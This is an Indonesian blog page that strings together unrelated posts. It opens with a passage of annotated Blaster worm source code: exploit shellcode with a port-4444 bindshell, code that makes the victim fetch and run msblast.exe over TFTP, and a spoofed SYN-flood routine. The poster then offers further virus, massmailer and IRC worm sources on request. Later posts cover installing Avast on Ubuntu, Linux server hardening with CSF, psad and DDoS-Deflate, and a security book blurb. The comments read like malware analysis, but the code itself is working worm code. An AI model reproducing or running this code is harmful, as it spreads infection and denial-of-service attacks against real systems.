\"\xcc\xe0\xfd\x7f\" /* primary thread data block */ \"\xcc\xe0\xfd\x7f\" /* primary thread data block */ /* port 4444 bindshell */ \"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\" \"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\" \"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\" \"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\" \"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\" \"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\" \"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\" \"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\" \"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\" \"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\" \"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\" \"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\" \"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80\" \"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\" \"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\" \"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\" \"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\" \"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\" \"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81\" \"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80\" \"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80\" \"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80\" \"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80\" \"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80\" \"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81\" \"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6\" \"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3\" \"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50\" \"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4\" \"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4\" \"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4\" \"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f\" \"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b\" \"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80\" \"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89\" \"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80\" \"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83\" \"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83\" \"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78\" \"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c\" \"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b\" \"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04\"; unsigned char request4[]={ 0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; int ThreadId; int len; int sizeof_sa; int ret; int opt; void *hThread; struct sockaddr_in target_ip; struct sockaddr_in sa; int fd; char cmdstr[0x200]; int len1; unsigned char buf2[0x1000]; int i; /* * Turn off non-blocking (i.e. re-enable blocking mode) * DEFENSE: Tarpit programs (e.g. 'labrea' or 'deredoc') * will slow down the spread of this worm. It takes a long * time for blocking calls to timeout. I had several * thousand worms halted by my 'deredoc' tarpit. */ opt = 0; ioctlsocket(sock, FIONBIO , &opt); /* * Choose whether the exploit targets Win2k or WinXP. */ if (winxp1_or_win2k2 == 1) ret = 0x100139d; else ret = 0x18759f; memcpy(sc+36, (unsigned char *) &ret, 4); /* ---------------------------------------------- * This section is just copied from the original exploit * script. This is the same as the scripts that have been * widely published on the Internet. */ len=sizeof(sc); memcpy(buf2,request1,sizeof(request1)); len1=sizeof(request1); *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2; *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2; memcpy(buf2+len1,request2,sizeof(request2)); len1=len1+sizeof(request2); memcpy(buf2+len1,sc,sizeof(sc)); len1=len1+sizeof(sc); memcpy(buf2+len1,request3,sizeof(request3)); len1=len1+sizeof(request3); memcpy(buf2+len1,request4,sizeof(request4)); len1=len1+sizeof(request4); *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc; if (send(sock,bindstr,sizeof(bindstr),0)== -1) { //perror(\"- Send\"); return; } if (send(sock,buf2,len1,0)== -1) { //perror(\"- Send\"); return; } closesocket(sock); Sleep(400); /* ----------------------------------------------*/ /* * This section of code connects to the victim on port 4444. * DEFENSE : This means you can block this worm by blocking * TCP port 4444. * FAQ: This port is only open for the brief instant needed * to exploit the victim. Therefore, you can't scan for * port 4444 in order to find Blaster victims. */ if ((fd=socket(AF_INET,SOCK_STREAM,0)) == -1) return; memset(&target_ip, 0, sizeof(target_ip)); target_ip.sin_family = AF_INET; target_ip.sin_port = htons(SHELL_PORT_4444); target_ip.sin_addr.s_addr = inet_addr(victim_ip); if (target_ip.sin_addr.s_addr == SOCKET_ERROR) return; if (connect(fd, (struct sockaddr*)&target_ip, sizeof(target_ip)) == SOCKET_ERROR) return; /* * This section recreates the IP address from whatever IP * address this successfully connected to. In practice, * the strings \"victim_ip\" and \"target_ip_string\" should be * the same. */ memset(target_ip_string, 0, sizeof(target_ip_string)); sizeof_sa = sizeof(sa); getsockname(fd, (struct sockaddr*)&sa, &sizeof_sa); sprintf(target_ip_string, \"%d.%d.%d.%d\", sa.sin_addr.s_net, sa.sin_addr.s_host, sa.sin_addr.s_lh, sa.sin_addr.s_impno); /* * This section creates a temporary TFTP service that is * ONLY alive during the period of time that the victim * needs to download. * FAQ: You can't scan for TFTP in order to find Blaster * victims because the port is rarely open. */ if (fd_tftp_service) closesocket(fd_tftp_service); hThread = CreateThread(0,0, blaster_tftp_thread,0,0,&ThreadId); Sleep(80); /*give time for thread to start*/ /* * This sends the command * tftp -i 1.2.3.4 GET msblast.exe * to the victim. The \"tftp.exe\" program is built into * Windows. It's intended purpose is to allow users to * manually update their home wireless access points with * new software (and other similar tasks). However, it is * not intended as a generic file-transfer protocol (it * stands for \"trivial-file-transfer-protocol\" -- it is * intended for only trivial tasks). Since a lot of hacker * exploits use the \"tftp.exe\" program, a good hardening * step is to remove/rename it. */ sprintf(cmdstr, \"tftp -i %s GET %s\n\", target_ip_string, MSBLAST_EXE); if (send(fd, cmdstr, strlen(cmdstr), 0) <= 0) goto closesocket_and_return; /* * Wait 21 seconds for the victim to request the file, then * for the file to be delivered via TFTP. */ Sleep(1000); for (i=0; i<10 && is_tftp_running; i++) Sleep(2000); /* * Assume the the transfer is successful, and send the * command to start executing the newly downloaded program. * BUFORD: The hacker starts this twice. Again, it * demonstrates a lock of confidence, so he makes sure it's * started by doing it twice in slightly different ways. * Note that the \"BILLY\" mutex will prevent from actually * running twice. */ sprintf(cmdstr, \"start %s\n\", MSBLAST_EXE); if (send(fd, cmdstr, strlen(cmdstr), 0) <= 0) goto closesocket_and_return; Sleep(2000); sprintf(cmdstr, \"%s\n\", MSBLAST_EXE); send(fd, cmdstr, strlen(cmdstr), 0); Sleep(2000); /* * This section closes the things started in this procedure */ closesocket_and_return: /* Close the socket for the remote command-prompt that has * been established to the victim. */ if (fd != 0) closesocket(fd); /* Close the TFTP server that was launched above. As noted, * this means that the TFTP service is not running most of * the time, so it's not easy to scan for infected systems. */ if (is_tftp_running) { TerminateThread(hThread,0); closesocket(fd_tftp_service); is_tftp_running = 0; } CloseHandle(hThread); } /** * Convert the name into an IP address. If the IP address * is formatted in decimal-dot-notation (e.g. 192.2.0.43), * then return that IP address, otherwise do a DNS lookup * on the address. Note that in the case of the worm, * it always gives the string \"windowsupdate.com\" to this * function, and since Microsoft turned off that name, * the DNS lookup will usually fail, so this function * generally returns -1 (SOCKET_ERROR), which means the * address 255.255.255.255. */ int blaster_resolve_ip(const char *windowsupdate_com) { int result; result = inet_addr(windowsupdate_com); if (result == SOCKET_ERROR) { HOSTENT *p_hostent = gethostbyname(windowsupdate_com); if (p_hostent == NULL) result = SOCKET_ERROR; else result = *p_hostent->h_addr;
}

return result;
}


/*
* This thre
*/
ULONG WINAPI blaster_DoS_thread(LPVOID p)
{
int opt = 1;
int fd;
int target_ip;


/* Lookup the domain-name. Note that no checking is done
* to ensure that the name is valid. Since Microsoft turned
* this off in their domain-name servers, this function now
* returns -1. */
target_ip = blaster_resolve_ip(\"windowsupdate.com\");


/* Create a socket that the worm will blast packets at
* Microsoft from. This is what is known as a \"raw\" socket.
* So-called \"raw-sockets\" are ones where packets are
* custom-built by the programmer rather than by the TCP/IP
* stack. Note that raw-sockets were not available in Windows
* until Win2k. A cybersecurity pundit called Microsoft
* \"irresponsible\" for adding them.
*
* That's probably an
* unfairly harsh judgement (such sockets are available in
* every other OS), but it's true that it puts the power of
* SYNflood attacks in the hands of lame worm writers. While
* the worm-writer would probably have chosen a different
* DoS, such as Slammer-style UDP floods, it's likely that
* Buford wouldn't have been able to create a SYNflood if
* raw-sockets had not been added to Win2k/WinXP. */
fd = WSASocket(
AF_INET, /*TCP/IP sockets*/
SOCK_RAW, /*Custom TCP/IP headers*/
IPPROTO_RAW,
NULL,
0,
WSA_FLAG_OVERLAPPED
);
if (fd == SOCKET_ERROR)
return 0;

/* Tell the raw-socket that IP headers will be created by the
* programmer rather than the stack. Most raw sockets in
* Windows will also have this option set. */
if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL,
(char*)&opt, sizeof(opt)) == SOCKET_ERROR)
return 0;


/* Now do the SYN flood. The worm writer decided to flood
* slowly by putting a 20-millisecond delay between packets
* -- causing only 500 packets/second, or roughly, 200-kbps.
* There are a couple of reasons why the hacker may have
* chosen this.
* 1. SYNfloods are not intended to be bandwidth floods,
* even slow rates are hard to deal with.
* 2. Slammer DoSed both the sender and receiver, therefore
* senders hunted down infected systems and removed
* them. This won't DoS the sender, so people are more
* likely not to care about a few infected machines.
*/
for (;;) {
blaster_send_syn_packet(target_ip, fd);

/* Q: How fast does it send the SYNflood?
* A: About 50 packets/second, where each packet is
* 320-bits in size, for a total of 15-kbps.
* It means that Buford probably intended for
* dialup users to be a big source of the DoS
* attack. He was smart enough to realize that
* faster floods would lead to users discovering
* the worm and turning it off. */
Sleep(20);
}


closesocket(fd);
return 0;
}



/*
* This is a standard TCP/IP checksum algorithm
* that you find all over the web.
*/
int blaster_checksum(const void *bufv, int length)
{
const unsigned short *buf = (const unsigned short *)bufv;
unsigned long result = 0;

while (length > 1) {
result += *(buf++);
length -= sizeof(*buf);
}
if (length) result += *(unsigned char*)buf;
result = (result >> 16) + (result & 0xFFFF);
result += (result >> 16);
result = (~result)&0xFFFF;

return (int)result;
}



/*
* This is a function that uses \"raw-sockets\" in order to send
* a SYNflood at the victim, which is \"windowsupdate.com\" in
* the case of the Blaster worm.
*/
void blaster_send_syn_packet(int target_ip, int fd)
{

struct IPHDR
{
unsigned char verlen; /*IP version & length */
unsigned char tos; /*IP type of service*/
unsigned short totallength;/*Total length*/
unsigned short id; /*Unique identifier */
unsigned short offset; /*Fragment offset field*/
unsigned char ttl; /*Time to live*/
unsigned char protocol; /*Protocol(TCP, UDP, etc.)*/
unsigned short checksum; /*IP checksum*/
unsigned int srcaddr; /*Source address*/
unsigned int dstaddr; /*Destination address*/

};
struct TCPHDR
{
unsigned short srcport;
unsigned short dstport;
unsigned int seqno;
unsigned int ackno;
unsigned char offset;
unsigned char flags;
unsigned short window;
unsigned short checksum;
unsigned short urgptr;
};
struct PSEUDO
{
unsigned int srcaddr;
unsigned int dstaddr;
unsigned char padzero;
unsigned char protocol;
unsigned short tcplength;
};
struct PSEUDOTCP
{
unsigned int srcaddr;
unsigned int dstaddr;
unsigned char padzero;
unsigned char protocol;
unsigned short tcplength;
struct TCPHDR tcphdr;
};




char spoofed_src_ip[16];
unsigned short target_port = 80; /*SYNflood web servers*/
struct sockaddr_in to;
struct PSEUDO pseudo;
char buf[60] = {0};
struct TCPHDR tcp;
struct IPHDR ip;
int source_ip;


/* Yet another randomizer-seeding */
srand(GetTickCount());

/* Generate a spoofed source address that is local to the
* current Class B subnet. This is pretty smart of Buford.
* Using just a single IP address allows defenders to turn
* it off on the firewall, whereas choosing a completely
* random IP address would get blocked by egress filters
* (because the source IP would not be in the proper range).
* Randomly choosing nearby IP addresses it probably the
* best way to evade defenses */
sprintf(spoofed_src_ip, \"%i.%i.%i.%i\",
local_class_a, local_class_b, rand()%255, rand()%255);
source_ip = blaster_resolve_ip(spoofed_src_ip);

/* Build the sockaddr_in structure. Normally, this is what
* the underlying TCP/IP stack uses to build the headers
* from. However, since the DoS attack creates its own
* headers, this step is largely redundent. */
to.sin_family = AF_INET;
to.sin_port = htons(target_port); /*this makes no sense */
to.sin_addr.s_addr = target_ip;

/* Create the IP header */
ip.verlen = 0x45;
ip.totallength = htons(sizeof(ip) + sizeof(tcp));
ip.id = 1;
ip.offset = 0;
ip.ttl = 128;
ip.protocol = IPPROTO_TCP;
ip.checksum = 0; /*for now, set to true value below */
ip.dstaddr = target_ip;

/* Create the TCP header */
tcp.dstport = htons(target_port);
tcp.ackno = 0;
tcp.offset = (unsigned char)(sizeof(tcp)<<4); tcp.flags = 2; /*TCP_SYN*/ tcp.window = htons(0x4000); tcp.urgptr = 0; tcp.checksum = 0; /*for now, set to true value below */ /* Create pseudo header (which copies portions of the IP * header for TCP checksum calculation).*/ pseudo.dstaddr = ip.dstaddr; pseudo.padzero = 0; pseudo.protocol = IPPROTO_TCP; pseudo.tcplength = htons(sizeof(tcp)); /* Use the source adress chosen above that is close, but * not the same, as the spreader's IP address */ ip.srcaddr = source_ip; /* Choose a random source port in the range [1000-19999].*/ tcp.srcport = htons((unsigned short)((rand()%1000)+1000)); /* Choose a random sequence number to start the connection. * BUG: Buford meant htonl(), not htons(), which means seqno * will be 15-bits, not 32-bits, i.e. in the range * [0-32767]. (the Windows rand() function only returns * 15-bits). */ tcp.seqno = htons((unsigned short)((rand()<<16)|rand())); pseudo.srcaddr = source_ip; /* Calculate TCP checksum */ memcpy(buf, &pseudo, sizeof(pseudo)); memcpy(buf+sizeof(pseudo), &tcp, sizeof(tcp)); tcp.checksum = blaster_checksum(buf, sizeof(pseudo)+sizeof(tcp)); memcpy(buf, &ip, sizeof(ip)); memcpy(buf+sizeof(ip), &tcp, sizeof(tcp)); /* I have no idea what's going on here. The assembly code * zeroes out a bit of memory near the buffer. I don't know * if it is trying to zero out a real variable that happens * to be at the end of the buffer, or if it is trying to zero * out part of the buffer itself. */ memset(buf+sizeof(ip)+sizeof(tcp), 0, sizeof(buf)-sizeof(ip)-sizeof(tcp)); /* Major bug here: the worm writer incorrectly calculates the * IP checksum over the entire packet. This is incorrect -- * the IP checksum is just for the IP header itself, not for * the TCP header or data. However, Windows fixes the checksum * anyway, so it's not a problem. */ ip.checksum = blaster_checksum(buf, sizeof(ip)+sizeof(tcp)); /* Copy the header over again. The reason for this is simply to * copy over the checksum that was just calculated above, but * it's easier doing this for the programmer rather than * figuring out the exact offset where the checksum is * located */ memcpy(buf, &ip, sizeof(ip)); /* Send the packet */ sendto(fd, buf, sizeof(ip)+sizeof(tcp), 0, (struct sockaddr*)&to, sizeof(to)); }

Ini hanya dua virus dunia nyata yang besar pada waktu mereka. Saya memiliki sumber untuk beberapa yang lain juga keren. Blood Red, massmailer dan DoS tool, cukup mengagumkan. Tanyakan apa yang Anda inginkan. Juga IRCworm bagi orang yang menginginkannya. Jika Anda meminta Anda juga perlu sebuah alasan yang sah . Atau aku hanya perlu tahu Anda sebagai pengunjung tetap di sini.
enjoyyy ..

Install And Registed Antivirus Avast On Ubuntu ( Terbaru)

Install And Registed Antivirus Avast On Ubuntu ( Terbaru)

Requirements :
Ubuntu & Email

Pendahuluan:
Orang yang biasanya bekerja dengan Ubuntu adalah orang yang pergi dan berusaha mencari alternatif untuk sistem operasi Microsoft biasanya karena langit meroket harga tetapi juga untuk mengeksplorasi pilihan lain di dunia komputer. Sekarang tidak diketahui banyak microsofties istilah berasal dari mengerang konsisten dari mereka, karena itu Anda mendengar lebih banyak tentang virus yang mengerikan di windows tapi tidak akan pernah menduga ancaman di Linux.



Namun alasan utama untuk ini adalah digambarkan karena popularitas sistem operasi harus memiringkan keseimbangan sehingga akan OS yang ditargetkan dan saat ini dengan Ubuntu dikapalkan pada beberapa industri besar yang PC. Ubuntu adalah sangat mungkin untuk melihat lebih dalam hari-hari mendatang. Dalam sebuah studi total 2001 virus
adalah:

Windows: 60.000
Unix: 5
Macintosh: 40 (yang menyebabkan kerusakan besar 4 jumlah)
Linux: 40
Now with viruses coming out at rate that developers can no longer keep up and more sophisticated Trojans R.A.T.s and similar are appearing we should also be aware running Linux without and proper AV is not a clever risk.

Instalasi:

Untuk menginstal,
1. Pertama buka New terminal dan gunakan perintah WGET untuk menginstall Gunakan SYNTAX berikut untuk memulai instalasi.

http://files.avast.com/files/linux/avast4workstation_1.0.8-2_i386.deb

2. Harap dicatat perintah ini hanya menginstal Avast untuk menjalankan dari terminal dan tidak bar aplikasi. Jadi untuk menginstalnya dalam ke bar Aplikasi lakukan hal berikut:

cd / usr/lib/avast4workstation/share/avast/desktop
sudo. / install-desktop-entries.sh

Ini akan menginstal AVAST ke Applications -> Accessories.

3. Selanjutnya Kita Perlu Lisensi YANG GRATIS hanya menyediakan alamat email Anda di sini: http://www.avast.com/eng/home-registration.php dan Anda akan dikirim Keys. Ketika Anda memulai AVAST itu akan meminta salinan kunci dalam kunci dan update. ( Licensi Akan DikirimKan Ke Email Anda Dalam Waktu 24 Jam )

Uninstall:

Untuk MengUninstall Avastnya Hanya dengan menggunakan perintah berikut:


1.

dpkg-r avast4workstation

-> ini akan menghapus AVAST dari komputer Anda tanpa banyak kesulitan.

2.

dpkg - get-selections | grep avast

-> Meskipun tidak perlu perintah ini menarik untuk melihat semua produk yang dibuat oleh Avast.

Enjoyy ...

Linux (Web) Server Security ( Bahasa Indonesia)

Linux (Web) Server Security

Berikut ini salah satu tutorial saya tentang securty linux. Ini SEPENUHNYA belum selesai, dan masih banyak yang lain. Tapi sebagian besar sudah ada di sana;)

Saya ingin memposting beberapa tips tentang bagaimana Anda dapat dengan mudah mengamankan jaringan Anda pada distro berbasis debian,

Dalam tutorial ini kita akan menggunakan CSF / LFD (firewall terintegrasi iptable), psad untuk portscans anti dan DDoS-Deflate untuk perlindungan terhadap (D) serangan DoS, untuk keamanan lebih pada server Anda. Kami juga akan menggunakan webinterface pada beberapa tempat, bukan konsol untuk membuat segalanya lebih mudah bagi pemula juga, untuk ini saya memilih webmin, seperti yang terintegrasi ke dalam segala sesuatu yang dapat Anda lakukan pada sistem linux.


Sebelum kita mulai kita perlu menginstal apache / php dan mysql di server Anda juga, tidak banyak bahwa Anda dapat membaca tentang bagaimana untuk dengan mudah melakukan itu pada sistem berbasis debian SINI:

http://www.howtoforge.com/ubuntu_debian_lamp_server

Silakan perbarui sistem debian anda sehingga kita tidak memiliki crash pada dependensi.
Dalam beberapa kasus Anda mungkin ingin mendapatkan paket build-essential

apt-get install build-essential

Anda juga harus mendapatkan syslog-ng untuk penebangan.

apt-get install syslog-ng

Langkah pertama:
Instalasi webmin,

Kami mulai dengan antarmuka web kami untuk memudahkan pengelolaan dan set up etc firewall:

wget http://prdownloads.sourceforge.net/webadmin/webmin_1.500_all.deb

Installing webmin with:

dpkg -i webmin_1.500_all.deb

Jika Anda mendapatkan error yang mengatakan Anda tidak memiliki semua dependensi , lalu menjalankan:

apt-get -f install

Jadi telah diinstal s Anda dapat dengan mudah mengakses web interface Anda dengan masuk ke alamat ini:

http://localhost:10000

Jika ini sekarang menampilkan halaman login yang telah Anda lakukan dengan benar.

Sekarang kita dapat mulai bagian yang menyenangkan dari pengaturan firewall

Langkah kedua:
Instalasi dan konfigurasi firewall CSF

Men-download CSF:

wget http://configserver.com/free/csf.tgz

Unrar paket:

tar xvzf csf.tgz

Beralih ke direktori CSF:

cd csf

selanjutnya jalankan script install:

sh install.sh

Jika ini selesai tanpa kesalahan kita sekarang dapat memuat CSF ke webmin.

Memuat module:
Masuk ke webmin interface Anda dan pergi ke Webmin> Webmin Konfigurasi Webmin Modules>.
Pada file lokal Anda mengisi jalan ke module Webmin diinstal oleh CSF,...

/etc/csf/csfwebmin.tgz

Dan tekan install module.

Jika ini berjalan baik Anda sekarang akan melihat " security Config Server & Firewall" Dalam tab SISTEM di webmin.


Langkah ketiga:
Konfigurasi Security & Firewall ConfigServer

Pergi ke tab Security ConfigServer & Firewall di webmin dan tekan "firewall configuration"
Untuk tutorial ini kita hanya akan mengisi bagian yang termudah dari konfigurasi tetapi merasa bebas untuk menjelajahi lebih banyak potensi besar dari CSF.

Mengubah area konfigurasi,

Berhenti menjalankan CSF dalam testmode:

TESTING=1 to TESTING=0

Mengatur port terbuka (di sini kita hanya akan mengisi apa yang kita butuhkan pada saat ini)

TCP_IN=21,22,80,10000

21 untuk ftp, 22 untuk ssh, 80 untuk www dan 10000 untuk webmin (yang terakhir di sini sangat penting untuk diingat)

TCP_OUT=21,22,80,10000

Mengubah permintaan ICMP (opsional) ini akan menonaktifkan permintaan ping dan jawaban. Aku personaly ingin mengatur ini untuk pergi, sehingga tidak ada serangan ping yang spesifik dapat dibuat dengan paket khusus.

ICMP_IN=0

ICMP_OUT=0

Perlindungan terhadap synflood (untuk webservers dll):

SYNFLOOD=1

Perlindungan terhadap portfloods:

PORTFLOOD=1

Itu sudah semua, scroll ke bawah ke akhir dan tekan Ganti untuk menyimpan semua perubahan yang telah dibuat untuk konfigurasi.

Penggunaan dari CSF akan dijelaskan di tutorial lain di kemudian hari, tetapi interface telah melarang dan mengapa, "Lihat LFD log" untuk melihat apa yang telah mengambil sebagai proses yang mencurigakan, yang telah login melalui ssh dan jika ada portscans akan terdeteksi.


Langkah keempat:
Instalasi psad

Seperti disebutkan sebelumnya, Anda akan perlu memiliki syslog-ng di install sebelum menjalankan psad benar, dengan ini dilakukan, mari kita mulai!

Download dan instal psad:

apt-get install psad

Pengaturan syslog-ng untuk login sesuatu dari psad (Anda tidak perlu menggunakan nano jika Anda seperti alat pengeditan lainnya yang lebih baik.

nano /etc/syslog-ng/syslog-ng.conf

Cari Bagian "pipes #" dan menambahkan ini ke daftar:

destination psadpipe { pipe("/var/lib/psad/psadfifo"); };

Cari bagian "filters #" dari konfigurasi dan tambahkan baris ini:

filter f_kerninfo { facility(kern); };

Dan semua jalan di bawah konfigurasi, tambahkan baris ini:

log {
source(s_all);
filter(f_kerninfo);
destination(psadpipe);
};

Restart syslog-ng:

/etc/init.d/syslog-ng restart

Sekarang kita memiliki logging di tempat, dan kita bisa mulai mengkonfigurasi psad:

nano /etc/psad/psad.conf

Bagian yang paling penting adalah ini, mengisinya dengan informasi Anda sendiri:
Alamat email Anda :

EMAIL_ADDRESSES

Hostname Anda (seperti http://localhost):

HOSTNAME

Set home_net untuk tidak digunakan:

HOME_NET NOT_USED; ### only one interface on box

Jika Anda ingin mengatur port untuk mengabaikan pada scan Anda dapat melakukannya seperti ini (opsional):

IGNORE_PORTS tcp/88, udp/3000;

Untuk IDS dan iptable support:

ENABLE_AUTO_IDS Y;
IPTABLES_BLOCK_METHOD Y;

Sekarang save dan tutup konfigurasi.
Restart psad:...

/etc/init.d/psad restart

Sekarang kita butuhkan adalah menambahkan dua aturan iptable sehingga psad dapat menggunakan iptable logging, dilakukan dengan dua perintah:...

iptables -A INPUT -j LOG
iptables -A FORWARD -j LOG

Itu semua untuk psad, sekarang harus berdiri dan berjalan dan laporan scan dapat dibuat dengan menggunakan perintah ini:

psad -S

Langkah lima:
Anti-DDoS
Menyiapkan DDoS-Deflate lebih mudah daripada yang Anda pikirkan, hanya dengan beberapa perintah dan perubahan,
Men-download dan menginstal DDoS-Deflate:

wget http://www.inetbase.com/scripts/ddos/install.sh
chmod 0700 install.sh
./install.sh

Untuk mengkonfigurasi DDoS Deflate Anda akan perlu melakukan beberapa perubahan kecil:
Buka script dalam editor favorit Anda,...

nano /usr/local/ddos/ddos.sh

scroll ke bawah untuk add_to_cron () dan Anda akan menemukan 2x dari garis-garis

service crond restart:

Mengubahnya ke:

service cron restart

Simpan dan tutup script dan membuka ddos.conf ini:

nano /usr/local/ddos/ddos.conf

Di sini Anda dapat mengubah bagaimana DDoS harus bereaksi dalam situasi yang berbeda dan Anda dapat menempatkan konfigurasi Anda sendiri pada baris ini,

Seberapa sering script akan berjalan (menit):

FREQ=1

Jumlah koneksi pengguna harus memiliki waktu yang sama sebelum dia mendapatkan yang dilarang oleh script:

NO_OF_CONNECTIONS=30

Set ini ke 0 untuk menggunakan iptables karena kita tidak menggunakan APF:

APF_BAN=0

Membunuh koneksi atau tidak:

KILL=1

Jika Anda ingin email dari IP dilarang itu kemudian mengatur email Anda di dalam "":

EMAIL_TO=""

Sekarang simpan dan tutup konfigurasi dan jalankan perintah ini untuk menambahkan script ke crontab sehingga berjalan setiap menit:

/usr/local/ddos/ddos.sh --cron

Sebagai tambahan beberapa hal yang mungkin ingin Anda tambahkan ke server linux untuk fungsi ekstra terhadap (D) serangan DoS:
Enable SYN_Cookies:

sysctl -w net.ipv4.tcp_syncookies=1

Meningkatkan backlog Connection, memungkinkan lebih banyak koneksi...

sysctl -w net.ipv4.tcp_max_syn_backlog=2048

Jika Anda ingin membuatnya permanen hanya menambahkan mereka ke konfigurasi sysctl di /etc/sysctl dir sehingga akan tetap seperti itu bahkan setelah reboot.


Dan itu semua yang anda butuhkan untuk mengatur keamanan lebih pada kotak linux anda, bahkan jika itu di rumah atau di server Anda. Merasa bebas untuk membaca di sekitar dokumentasi yang berbeda (yang disediakan oleh google search) dan menerapkan solusi yang lebih aman dan mengambil penggunaan semua fitur bagus lain yang alat ini memiliki.

Jika Anda memiliki pertanyaan silahkan PM saya atau posting di sini.

enjoyy ...

Tujuh Deadliest USB Serangan (Serangan Mematikan Syngress seri ke 7)

Tujuh Deadliest USB Serangan (Serangan Mematikan Syngress seri ke 7)

Apakah Anda perlu mengikuti hacks terbaru, serangan, dan eksploitasi mempengaruhi teknologi USB? Kemudian Anda perlu Tujuh Serangan Mematikan USB. Buku ini titik-titik hacks paling berbahaya dan eksploitasi khusus untuk USB, meletakkan anatomi serangan ini termasuk bagaimana untuk membuat sistem anda lebih aman. Anda akan menemukan cara terbaik untuk mempertahankan terhadap hacks ini setan dengan langkah-demi-langkah instruksi dan belajar teknik untuk membuat komputer Anda dan jaringan tak tertembus.


